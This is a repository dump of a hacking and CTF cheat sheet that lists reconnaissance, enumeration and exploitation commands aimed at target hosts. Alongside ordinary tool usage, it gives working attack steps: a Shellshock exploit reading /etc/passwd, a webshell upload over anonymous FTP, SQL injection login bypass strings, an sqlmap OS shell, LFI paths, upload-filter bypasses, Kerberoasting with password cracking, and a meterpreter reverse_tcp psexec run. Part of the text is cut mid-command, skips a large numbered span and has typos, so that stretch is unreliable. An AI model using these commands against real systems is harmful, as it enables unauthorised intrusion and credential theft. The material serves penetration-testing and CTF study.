├── Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3 ├── Untitled 1.png ├── Untitled 2.png ├── Untitled 3.png ├── Untitled 4.png ├── Untitled 5.png ├── Untitled 6.png ├── Untitled 7.png ├── Untitled Database 2c8912d8c7b747859491d93a41439662.csv ├── Untitled Database 2c8912d8c7b747859491d93a41439662 │ ├── MD5 $PASS $SALT Example 018d56d7f72d4139bb09efae564f41e8.md │ ├── MD5 $SALT $PASS e070dfeb1b1449eda8408d651d8e336b.md │ ├── MD5 Hash Example 4eee9a1c2fbf4826a438decf1d2e0a2c.md │ ├── NTLM Hash Example 61f973fc93c241f1a2ab8ecbcd528aac.md │ ├── SHA-256 $PASS $SALT ad4fae024ccb4e039324d5e964321750.md │ ├── SHA-256 $SALT $PASS e2b56f602f494450ad85a542e20d8be5.md │ ├── SHA-256 2bc6a6c1a79240e29f3f3c6ab906c626.md │ ├── SHA-512 $PASS $SALT 3de8a178f73f4c1c924378152cc95c6d.md │ ├── SHA-512 $SALT $PASS 1288b44530fd4c4581ea4d329180f023.md │ ├── SHA-512 43e0a92aa6e04cfa907c343f796fe318.md │ ├── SHA1 $PASS $SALT c533fcb037e948039b7c04ca7a23d477.md │ ├── SHA1 $SALT $PASS 19f737559ec84f29bfd936e9aa1ba7f2.md │ └── SHA1 Hash Example 3c9b5ac26c894cdebcc96ef55ad216cd.md ├── Untitled.png ├── psexec d818d32588314cb68f8ca3db57a6e1ef.md └── psexec d818d32588314cb68f8ca3db57a6e1ef │ └── Untitled.png ├── Hacking Cheat Sheet.md ├── README.md ├── report.md └── skel.sh /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled 1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hasamba/Hacking-and-CTF-Cheat-Sheet/7f6bbe7bd6bfabc074157a52c9dc580aa3d65ac2/Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled 1.png -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled 2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hasamba/Hacking-and-CTF-Cheat-Sheet/7f6bbe7bd6bfabc074157a52c9dc580aa3d65ac2/Hacking Cheat Sheet 
53ddee9781a440ebb77926762047b8b3/Untitled 2.png -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled 3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hasamba/Hacking-and-CTF-Cheat-Sheet/7f6bbe7bd6bfabc074157a52c9dc580aa3d65ac2/Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled 3.png -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled 4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hasamba/Hacking-and-CTF-Cheat-Sheet/7f6bbe7bd6bfabc074157a52c9dc580aa3d65ac2/Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled 4.png -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled 5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hasamba/Hacking-and-CTF-Cheat-Sheet/7f6bbe7bd6bfabc074157a52c9dc580aa3d65ac2/Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled 5.png -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled 6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hasamba/Hacking-and-CTF-Cheat-Sheet/7f6bbe7bd6bfabc074157a52c9dc580aa3d65ac2/Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled 6.png -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled 7.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/hasamba/Hacking-and-CTF-Cheat-Sheet/7f6bbe7bd6bfabc074157a52c9dc580aa3d65ac2/Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled 7.png -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled Database 2c8912d8c7b747859491d93a41439662.csv: -------------------------------------------------------------------------------- 1 | Hash,Example 2 | MD5 Hash Example,8743b52063cd84097a65d1633f5c74f5 3 | MD5 $PASS:$SALT Example,01dfae6e5d4d90d9892622325959afbe:7050461 4 | MD5 $SALT:$PASS,f0fda58630310a6dd91a7d8f0a4ceda2:4225637426 5 | SHA1 Hash Example,b89eaac7e61417341b710b727768294d0e6a277b 6 | SHA1 $PASS:$SALT,2fc5a684737ce1bf7b3b239df432416e0dd07357:2014 7 | SHA1 $SALT:$PASS,cac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024 8 | SHA-256,127e6fbfe24a750e72930c220a8e138275656b8e5d8f48a98c3c92df2caba935 9 | SHA-256 $PASS:$SALT,c73d08de890479518ed60cf670d17faa26a4a71f995c1dcc978165399401a6c4 10 | SHA-256 $SALT:$PASS,eb368a2dfd38b405f014118c7d9747fcc97f4f0ee75c05963cd9da6ee65ef498:560407001617 11 | SHA-512,82a9dda829eb7f8ffe9fbe49e45d47d2dad9664fbb7adf72492e3c81ebd3e29134d9bc12212bf83c6840f10e8246b9db54a4859b7ccd0123d86e5872c1e5082f 12 | SHA-512 $PASS:$SALT,e5c3ede3e49fb86592fb03f471c35ba13e8d89b8ab65142c9a8fdafb635fa2223c24e5558fd9313e8995019dcbec1fb584146b7bb12685c7765fc8c0d51379fd 13 | SHA-512 $SALT:$PASS,976b451818634a1e2acba682da3fd6efa72adf8a7a08d7939550c244b237c72c7d42367544e826c0c83fe5c02f97c0373b6b1386cc794bf0d21d2df01bb9c08a 14 | NTLM Hash Example,b4b9b02e6f09a9bd760f388b67351e2b -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled Database 2c8912d8c7b747859491d93a41439662/MD5 $PASS $SALT Example 018d56d7f72d4139bb09efae564f41e8.md: -------------------------------------------------------------------------------- 1 | # MD5 $PASS:$SALT Example 2 | 3 | 
Example: 01dfae6e5d4d90d9892622325959afbe:7050461 -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled Database 2c8912d8c7b747859491d93a41439662/MD5 $SALT $PASS e070dfeb1b1449eda8408d651d8e336b.md: -------------------------------------------------------------------------------- 1 | # MD5 $SALT:$PASS 2 | 3 | Example: f0fda58630310a6dd91a7d8f0a4ceda2:4225637426 -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled Database 2c8912d8c7b747859491d93a41439662/MD5 Hash Example 4eee9a1c2fbf4826a438decf1d2e0a2c.md: -------------------------------------------------------------------------------- 1 | # MD5 Hash Example 2 | 3 | Example: 8743b52063cd84097a65d1633f5c74f5 -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled Database 2c8912d8c7b747859491d93a41439662/NTLM Hash Example 61f973fc93c241f1a2ab8ecbcd528aac.md: -------------------------------------------------------------------------------- 1 | # NTLM Hash Example 2 | 3 | Example: b4b9b02e6f09a9bd760f388b67351e2b -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled Database 2c8912d8c7b747859491d93a41439662/SHA-256 $PASS $SALT ad4fae024ccb4e039324d5e964321750.md: -------------------------------------------------------------------------------- 1 | # SHA-256 $PASS:$SALT 2 | 3 | Example: c73d08de890479518ed60cf670d17faa26a4a71f995c1dcc978165399401a6c4 -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled Database 2c8912d8c7b747859491d93a41439662/SHA-256 $SALT $PASS e2b56f602f494450ad85a542e20d8be5.md: -------------------------------------------------------------------------------- 
1 | # SHA-256 $SALT:$PASS 2 | 3 | Example: eb368a2dfd38b405f014118c7d9747fcc97f4f0ee75c05963cd9da6ee65ef498:560407001617 -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled Database 2c8912d8c7b747859491d93a41439662/SHA-256 2bc6a6c1a79240e29f3f3c6ab906c626.md: -------------------------------------------------------------------------------- 1 | # SHA-256 2 | 3 | Example: 127e6fbfe24a750e72930c220a8e138275656b8e5d8f48a98c3c92df2caba935 -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled Database 2c8912d8c7b747859491d93a41439662/SHA-512 $PASS $SALT 3de8a178f73f4c1c924378152cc95c6d.md: -------------------------------------------------------------------------------- 1 | # SHA-512 $PASS:$SALT 2 | 3 | Example: e5c3ede3e49fb86592fb03f471c35ba13e8d89b8ab65142c9a8fdafb635fa2223c24e5558fd9313e8995019dcbec1fb584146b7bb12685c7765fc8c0d51379fd -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled Database 2c8912d8c7b747859491d93a41439662/SHA-512 $SALT $PASS 1288b44530fd4c4581ea4d329180f023.md: -------------------------------------------------------------------------------- 1 | # SHA-512 $SALT:$PASS 2 | 3 | Example: 976b451818634a1e2acba682da3fd6efa72adf8a7a08d7939550c244b237c72c7d42367544e826c0c83fe5c02f97c0373b6b1386cc794bf0d21d2df01bb9c08a -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled Database 2c8912d8c7b747859491d93a41439662/SHA-512 43e0a92aa6e04cfa907c343f796fe318.md: -------------------------------------------------------------------------------- 1 | # SHA-512 2 | 3 | Example: 82a9dda829eb7f8ffe9fbe49e45d47d2dad9664fbb7adf72492e3c81ebd3e29134d9bc12212bf83c6840f10e8246b9db54a4859b7ccd0123d86e5872c1e5082f 
-------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled Database 2c8912d8c7b747859491d93a41439662/SHA1 $PASS $SALT c533fcb037e948039b7c04ca7a23d477.md: -------------------------------------------------------------------------------- 1 | # SHA1 $PASS:$SALT 2 | 3 | Example: 2fc5a684737ce1bf7b3b239df432416e0dd07357:2014 -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled Database 2c8912d8c7b747859491d93a41439662/SHA1 $SALT $PASS 19f737559ec84f29bfd936e9aa1ba7f2.md: -------------------------------------------------------------------------------- 1 | # SHA1 $SALT:$PASS 2 | 3 | Example: cac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024 -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled Database 2c8912d8c7b747859491d93a41439662/SHA1 Hash Example 3c9b5ac26c894cdebcc96ef55ad216cd.md: -------------------------------------------------------------------------------- 1 | # SHA1 Hash Example 2 | 3 | Example: b89eaac7e61417341b710b727768294d0e6a277b -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hasamba/Hacking-and-CTF-Cheat-Sheet/7f6bbe7bd6bfabc074157a52c9dc580aa3d65ac2/Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/Untitled.png -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/psexec d818d32588314cb68f8ca3db57a6e1ef.md: -------------------------------------------------------------------------------- 1 | # psexec 2 | 3 | - msfconsole: 4 | - search psexec 5 | - options: 6 | - set 
rhost/domain/smbuser/smbpassword 7 | - set payload windows/x64/neterpeter/reverse_tcp 8 | - set lhost eth0 9 | - run 10 | - pxexec through meterpeter doesnt always work, we can try psexec.py 11 | - 12 | 13 | ![psexec%20d818d32588314cb68f8ca3db57a6e1ef/Untitled.png](psexec%20d818d32588314cb68f8ca3db57a6e1ef/Untitled.png) 14 | 15 | - we can also try wmiexec.py or smbexec.py -------------------------------------------------------------------------------- /Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/psexec d818d32588314cb68f8ca3db57a6e1ef/Untitled.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hasamba/Hacking-and-CTF-Cheat-Sheet/7f6bbe7bd6bfabc074157a52c9dc580aa3d65ac2/Hacking Cheat Sheet 53ddee9781a440ebb77926762047b8b3/psexec d818d32588314cb68f8ca3db57a6e1ef/Untitled.png -------------------------------------------------------------------------------- /Hacking Cheat Sheet.md: -------------------------------------------------------------------------------- 1 | # Hacking Cheat Sheet 2 | 3 | # Reconnaissance (Information Gathering) 4 | 5 | - [hunter.io](https://hunter.io/) - known email and users for a specific domain 6 | - theharvester - search for emails in several search engines 7 | 8 | ```bash 9 | theHarvester -d *.co.il -l 500 -b google 10 | ``` 11 | 12 | - sublist3r - search for subdomain for a given domain 13 | - [crt.sh](http://crt.sh) - subdomains search with %.tesla.co.il 14 | - [httprobe](https://github.com/tomnomnom/httprobe) - will check a list of domain if they are alive, we can fire it sublis3r results 15 | - [amass](https://github.com/OWASP/Amass) - can also search for subdomains and more 16 | 17 | ```bash 18 | amass enum -d tesla.com 19 | ``` 20 | 21 | - [builtwith](https://builtwith.com/) - show frameworks and technologies any domain is built with, then we can search for exploits for those technologies 22 | - [wappalizer](https://www.wappalyzer.com/download/) - browser 
addon that does almost the same as builtwith 23 | - whatweb - same but uglier than builtwith 24 | - [sumrecon](https://github.com/Gr1mmie/sumrecon) - script that automate some of the above 25 | - [shodan.io](http://shodan.io) - find open ports and services online 26 | - [dnsdumpster](https://dnsdumpster.com/) - dns recon & research, find & lookup dns records 27 | - [ipinfo.io](http://ipinfo.io) - ip info 28 | - [dehashed](https://www.dehashed.com) - find leaked emails and passwords 29 | - simplyemail - enumerate all the online places (github, target site etc) 30 | 31 | ``` 32 | git clone https://github.com/killswitch-GUI/SimplyEmail.git 33 | ./SimplyEmail.py -all -e TARGET-DOMAIN 34 | ``` 35 | 36 | - DNSRecon - DNS Bruteforce 37 | 38 | ```bash 39 | dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml 40 | ``` 41 | 42 | - Skipfish - prepares an interactive sitemap for the targeted site 43 | 44 | ```bash 45 | # basic scan 46 | skipfish -o out_dir https://www.host.com 47 | # using cookies to access authenticated pages 48 | skipfish -o out_dir -I urls_to_scan -X urls_not_to_scan -C cookie1=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX -C cookie2=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX https://www.host.com 49 | ``` 50 | 51 | - [namechk](https://namechk.com/) / [whatsmyname](https://whatsmyname.app/) / [namecheckup](https://namecheckup.com/) - OSINT use accounts around the web 52 | - [maltego](https://sectools.org/tool/maltego/) - data mining application 53 | 54 | - Exploiting Shellshock 55 | 56 | ```bash 57 | git clone https://github.com/nccgroup/shocker 58 | ``` 59 | 60 | ```bash 61 | ./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose 62 | ``` 63 | 64 | cat file (view file contents) 65 | 66 | ```bash 67 | echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$( 154 | ./nmapAutomator.sh 10.1.1.1 All 155 | ./nmapAutomator.sh 10.1.1.1 Basic 156 | ./nmapAutomator.sh 10.1.1.1 Recon 157 | ``` 158 | 159 | - 
[autorecon](https://github.com/Tib3rius/AutoRecon) - multi-threaded network reconnaissance tool which performs automated enumeration of services 160 | 161 | ```bash 162 | autorecon 127.0.0.1 163 | 164 | ``` 165 | 166 | - [Vanquish](https://github.com/frizb/Vanquish) - AIO tool (NMap | Hydra | Nikto | Metasploit | | Gobuster | Dirb | Exploitdb | Nbtscan | | Ntpq | Enum4linux | Smbclient | Rpcclient | | Onesixtyone | Sslscan | Sslyze | Snmpwalk | | Ident-user-enum | Smtp-user-enum | Snmp-check | Cisco-torch | | Dnsrecon | Dig | Whatweb | Wafw00f | | Wpscan | Cewl | Curl | Mysql | Nmblookup | Searchsploit | | Nbtscan-unixwiz | Xprobe2 | Blindelephant | Showmount) 167 | 168 | ```bash 169 | echo "[IP]" > ~/tools/vanquish/hosts.txt 170 | python2 Vanquish2.py -hostFile hosts.txt -logging -outputFolder ~/hackthebox/[BOXNAME] 171 | 172 | ``` 173 | 174 | - [hackerEnv](https://github.com/abdulr7mann/hackerEnv) - automation tool that quickly and easily sweep IPs and scan ports, vulnerabilities and exploit them 175 | 176 | ```bash 177 | ./hackerEnv -t 10.10.10.10 178 | ``` 179 | 180 | - [fsociety](https://github.com/Manisso/fsociety) - A Penetration Testing Framework, you will have every script that a hacker needs 181 | 182 | - recon-ag - full-featured web reconnaissance framework written in Python 183 | 184 | ```bash 185 | git clone https://github.com/lanmaster53/recon-ng.gitcd /recon-ng 186 | ./recon-ng 187 | show modules 188 | help 189 | ``` 190 | 191 | - [autorecon](https://github.com/Tib3rius/AutoRecon) - multi-threaded network reconnaissance tool which performs automated enumeration of services 192 | 193 | ```bash 194 | autorecon 127.0.0.1 195 | ``` 196 | 197 | - [legion](https://github.com/carlospolop/legion) - Automatic Enumeration Tool 198 | 199 | ```jsx 200 | sudo ~/tools/legion/legion.py 201 | options 202 | set host 10.0.0.210 203 | run 204 | ``` 205 | 206 | # Enumeration Open Ports 207 | 208 | [Pentesting 
Network](https://book.hacktricks.xyz/pentesting/pentesting-network) 209 | 210 | ## FTP Enumeration (21) 211 | 212 | ```bash 213 | nmap –script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 10.0.0.1 214 | FTP anonymous sign in 215 | mget * #download everything 216 | 217 | #can we upload file as anonymous? 218 | #if so we can try upload a cmd webshell and execute commands 219 | locate cmd.aspx #if iis 220 | put cmd.aspx 221 | #browse to the file: 222 | http://IP/cmd.aspx 223 | 224 | #we can also try to create a shell payload with msfvenum and upload it 225 | ``` 226 | 227 | ## **SSH (22):** 228 | 229 | ```bash 230 | ssh INSERTIPADDRESS 22 231 | 232 | nc IP 22 233 | 234 | nmap -p 22 --script ssh-brute --script-args userdb=users.lst,passdb=pass.lst --script-args ssh-brute.timeout=4s 235 | 236 | #downloading 237 | scp username@hostname:/path/to/remote/file /path/to/local/file 238 | ``` 239 | 240 | If NMAP show "SSH Filtered" it means that [port knocking](https://blog.rapid7.com/2017/10/04/how-to-secure-ssh-server-using-port-knocking-on-ubuntu-linux/) is enable 241 | 242 | ```bash 243 | #we need to find the /etc/knockd.conf (thorough LFI or FTP or something else) 244 | #inside there is a sequence 245 | knock IP SEQUENCE1 SEQUENCE2 SEQUENCE3 246 | #check nmap again 247 | ``` 248 | 249 | ## **SMTP Enumeration (25):** 250 | 251 | ```bash 252 | nmap --script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.0.0.1 253 | ``` 254 | 255 | ```bash 256 | nc -nvv INSERTIPADDRESS 25 257 | ``` 258 | 259 | ```bash 260 | telnet INSERTIPADDRESS 25 261 | ``` 262 | 263 | ```jsx 264 | use auxiliary/scanner/smtp/smtp_enum 265 | msf auxiliary(smtp_enum) > set rhosts 192.168.1.107 266 | msf auxiliary(smtp_enum) > set rport 25 267 | msf auxiliary(smtp_enum) > set USER_FILE /root/Desktop/user.txt 268 | msf auxiliary(smtp_enum) > exploitw 269 | ``` 270 | 271 | ## DNS (53) 
272 | 273 | ```bash 274 | #DNS zone transfer 275 | sudo nano /etc/hosts 276 | 10.10.10.123 friendzone.red 277 | host -l friendzone.red 10.10.10.123 278 | ``` 279 | 280 | ## **Finger Enumeration (79):** 281 | 282 | Download script and run it with a wordlist: [http://pentestmonkey.net/tools/user-enumeration/finger-user-enum](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum) 283 | 284 | ```bash 285 | finger-user-enum.pl [options] (-u username|-U users.txt) (-t host|-T ips.txt)( 286 | ``` 287 | 288 | ## **Web Enumeration (80/443):** 289 | 290 | [extra enumeration from hacktricks](https://book.hacktricks.xyz/pentesting/pentesting-web) 291 | 292 | if we get default apache page, try entering IP to HOSTS 293 | 294 | Before dirbusting, try going to index.php or index.html to know which extention to look for 295 | 296 | ```bash 297 | dirbuster (GUI) 298 | #1st try without "be recursive" 299 | ``` 300 | 301 | ```powershell 302 | cd ~/tools 303 | ./feroxbuster -u URL -w WORDLIST -x EXT -C 403 -t 100 304 | ``` 305 | 306 | ```bash 307 | Web Extensions 308 | 309 | sh,txt,php,html,htm,asp,aspx,js,xml,log,json,jpg,jpeg,png,gif,doc,pdf,mpg,mp3,zip,tar.gz,tar 310 | ``` 311 | 312 | ```bash 313 | dirb http://target.com /path/to/wordlist 314 | dirb http://target.com /path/to/wordlist -X .sh,.txt,.htm,.php,.cgi,.html,.pl,.bak,.old 315 | ``` 316 | 317 | ```bash 318 | gobuster dir -u https://target.com -b 403 ms-w /usr/share/wordlists/dirb/big.txt -x .txt,.php 319 | use -r (recursive) or try found folders 320 | ``` 321 | 322 | ```bash 323 | nikto –h 10.0.0.1 #web vulnerability scanner 324 | ``` 325 | 326 | ```jsx 327 | owasp zap 328 | ``` 329 | 330 | ```bash 331 | Look for Default Credentials 332 | ``` 333 | 334 | ```bash 335 | sql 336 | ``` 337 | 338 | - View Page Source 339 | 340 | ```bash 341 | Hidden Values 342 | Developer Remarks 343 | Extraneous Code 344 | Passwords! 
345 | ``` 346 | 347 | - burpsuite 348 | 349 | ```bash 350 | compare “host:” 351 | crsf token = no bruteforce 352 | add php code if url has anything.php 353 | 354 | anything being executed? 355 | try directory traversal 356 | ../../../home 357 | ``` 358 | 359 | - sign in page 360 | 361 | ```bash 362 | SQL Injection 363 | 364 | ‘or 1=1– – 365 | ‘ or ‘1’=1 366 | ‘ or ‘1’=1 — – 367 | ‘– 368 | Use known Username 369 | tyler’ — – 370 | tyler’) — – 371 | 372 | #bruteforce 373 | hydra -L -p
374 | ``` 375 | 376 | - file upload 377 | 378 | ```bash 379 | 380 | #if NMAP show something like: Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND 381 | #we want to check if we can upload files 382 | davtest -url http://IP 383 | #if we see succedd we can use curl to upload: 384 | curl -X PUT http://10.10.10.15/df.txt -d @test.txt 385 | #and execute it: 386 | **curl http://10.10.10.15/df.txt** 387 | 388 | Blacklisting bypass 389 | bypassed by uploading an unpopular php extensions. such as: pht, phpt, phtml, php3, php4, php5, php6 390 | Whitelisting bypass 391 | passed by uploading a file with some type of tricks, Like adding a null byte injection like ( shell.php%00.gif ). Or by using double extensions for the uploaded file like ( shell.jpg.php) 392 | ``` 393 | 394 | - Wfuzz - Subdomain brute forcer, replaces a part of the url like username with wordlist 395 | 396 | ```bash 397 | wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test 398 | 399 | wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ 400 | 401 | wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&mail=FUZZ" 402 | 403 | wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 $ip/FUZZ 404 | 405 | wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200 $ip/FUZZ 406 | ``` 407 | 408 | - [Knockpy](https://github.com/guelfoweb/knock) - enumerate subdomains on a target domain through a wordlist 409 | 410 | ```bash 411 | knockpy domain.com 412 | ``` 413 | 414 | - wpscan - if wordpress found 415 | 416 | ```bash 417 | wpscan --url [http://:80$target](http://:80$target) --enumerate u,t,p | tee $target-wpscan-enum 418 | #if we can enter wordpres, we can change the 404 page to php reverse shell code and gain access 419 | ``` 420 | 421 | - joomscan - if joomla found 422 | 423 | ```powershell 424 | 425 | cd ~/tools/joomscan 426 | perl joomscan.pl -u 
http://10.10.10.150/administrator/ 427 | ``` 428 | 429 | ## If A File is found 430 | 431 | - steghide - check pictures for hidden files 432 | 433 | ```bash 434 | apt-get install steghide 435 | 436 | steghide extract -sf picture.jpg 437 | 438 | steghide info picture.jpg 439 | 440 | apt-get install stegosuite 441 | ``` 442 | 443 | - [Stegseek](https://github.com/RickdeJager/stegseek) - lightning fast steghide cracker to extract hidden data from files 444 | 445 | ```bash 446 | stegseek [stegofile.jpg] [wordlist.txt] 447 | ``` 448 | 449 | - binwalk - extract hidden files from files (steganography) 450 | 451 | ```bash 452 | binwalk FILE.JPG 453 | #if something was found 454 | binwalk -e FILE 455 | ``` 456 | 457 | - strings - check strings in files 458 | 459 | ```bash 460 | stringe FILE.jpg 461 | ``` 462 | 463 | - [exiftool](https://github.com/exiftool/exiftool) - pictures metadata 464 | - zip2john - prepare an encrpyted zip file for john hacking 465 | 466 | ```bash 467 | zip2john ZIPFILE > zip.hashs 468 | ``` 469 | 470 | - SQLite DB 471 | 472 | ```powershell 473 | #if we found a flat-file db 474 | file EXAMPLE.db 475 | #if sqlite3 476 | sqlite3 477 | .tables 478 | PRAGMA table_info(customers); 479 | SELECT * FROM customers; 480 | ``` 481 | 482 | - sqlmap - check website for sql injection (more info down) 483 | 484 | [Sqlmap trick](https://hackertarget.com/sqlmap-post-request-injection/) - if we have a login page, we can try admin:admin, catch that in burpsuite, save the full request to a file, run: 485 | 486 | ```bash 487 | sqlmap -r FILENAME --level=5 --risk=3 --batch 488 | sqlmap -r FILENAME -dbs --level=5 --risk=3 --batch 489 | 490 | sqlmap -r FILENAME --dbs #enumarate DB's 491 | sqlmap -r FILENAME -D DB_Name --tables #enumarate tables 492 | sqlmap -r FILENAME -D DB_Name -T TABLE_Name --dump #DUMP table 493 | 494 | #Find SQL in webpage url automatically 495 | sqlmap -u https://IP/ –crawl=1 496 | 497 | #with authentication 498 | sqlmap -u “http://target_server” 
-s-data=param1=value1¶m2=value2 -p param1--auth-type=basic --auth-cred=username:password 499 | 500 | #Get A Reverse Shell (MySQL) 501 | sqlmap -r post_request.txt --dbms "mysql" --os-shell 502 | ``` 503 | 504 | - [fimap](https://github.com/kurobeats/fimap) - Check for LFI, find, prepare, audit, exploit and even google automatically for local and remote file inclusion 505 | 506 | ```bash 507 | ~/tools/fimap/src/fimap.py –H –u http://target-site.com/ -w output.txt 508 | ``` 509 | 510 | If we see in burpsuite php$url= we need to test for LFI (try /etc/passwrd) 511 | 512 | ```bash 513 | http://$ip/index.php?page=/etc/passwd 514 | http://$ip/index.php?file=../../../../etc/passwd 515 | ``` 516 | 517 | ## if a page redirects to another, we can use burp to stop 518 | 519 | ```bash 520 | Proxy -> Options -> Match and Replace 521 | ``` 522 | 523 | ![Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled.png](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled.png) 524 | 525 | ![Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%201.png](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%201.png) 526 | 527 | ## kerberos (88): 528 | 529 | ```powershell 530 | tel#add host to /etc/hosts 531 | sudo gedit /etc/hosts 532 | 533 | ./GetUserSPNs.py -request active.htb/SVC_TGS > admin.txt 534 | #the password we will get will be encrypted 535 | john admin.txt --wordlist=/usr/share/wordlists/rockyou.txt 536 | 537 | #with the cracked password... 
538 | psexec.py administrator@active.htb 539 | ``` 540 | 541 | ## **Pop3 (110):** 542 | 543 | ```bash 544 | telnet INSERTIPADDRESS 110 545 | ``` 546 | 547 | ```bash 548 | USER [username] 549 | ``` 550 | 551 | ```bash 552 | PASS [password] 553 | ``` 554 | 555 | - To login 556 | 557 | ```bash 558 | LIST 559 | ``` 560 | 561 | - To list messages 562 | 563 | ```bash 564 | RETR [message number] 565 | ``` 566 | 567 | - Retrieve message 568 | 569 | ```bash 570 | QUIT 571 | ``` 572 | 573 | ```bash 574 | quits 575 | ``` 576 | 577 | ## RPC (135) 578 | 579 | ```bash 580 | rpcclient --user="" --command=enumprivs -N $ip #Connect to an RPC share without a username and password and enumerate privledges 581 | rpcclient --user="" --command=enumprivs $ip #Connect to an RPC share with a username and enumerate privledges 582 | ``` 583 | 584 | ## **RPCBind (111):** 585 | 586 | ```bash 587 | rpcinfo –p x.x.x.x 588 | ``` 589 | 590 | ## **SMB\RPC Enumeration (139/445):** 591 | 592 | ```bash 593 | smbmap -H 10.10.10.149 594 | ``` 595 | 596 | ```bash 597 | smbclient -L \\\\10.0.0.100\\ 598 | smbclient \\\\10.0.0.100\\Replication 599 | prompt off #doesnt prompt of us downloading 600 | recurse on` #download all the files 601 | mget *` #download all files in this share 602 | 603 | ``` 604 | 605 | ```bash 606 | enum4linux -a 10.0.0.1 #Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing 607 | ``` 608 | 609 | ```bash 610 | nbtscan x.x.x.x #Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain 611 | ``` 612 | 613 | ```bash 614 | ridenum.py 192.168.XXX.XXX 500 50000 dict.txt 615 | ``` 616 | 617 | ```bash 618 | python /home/hasamba/tools/impacket/build/scripts-3.8/samrdump.py 192.168.XXX.XXX 619 | ``` 620 | 621 | ```bash 622 | nmap --script 
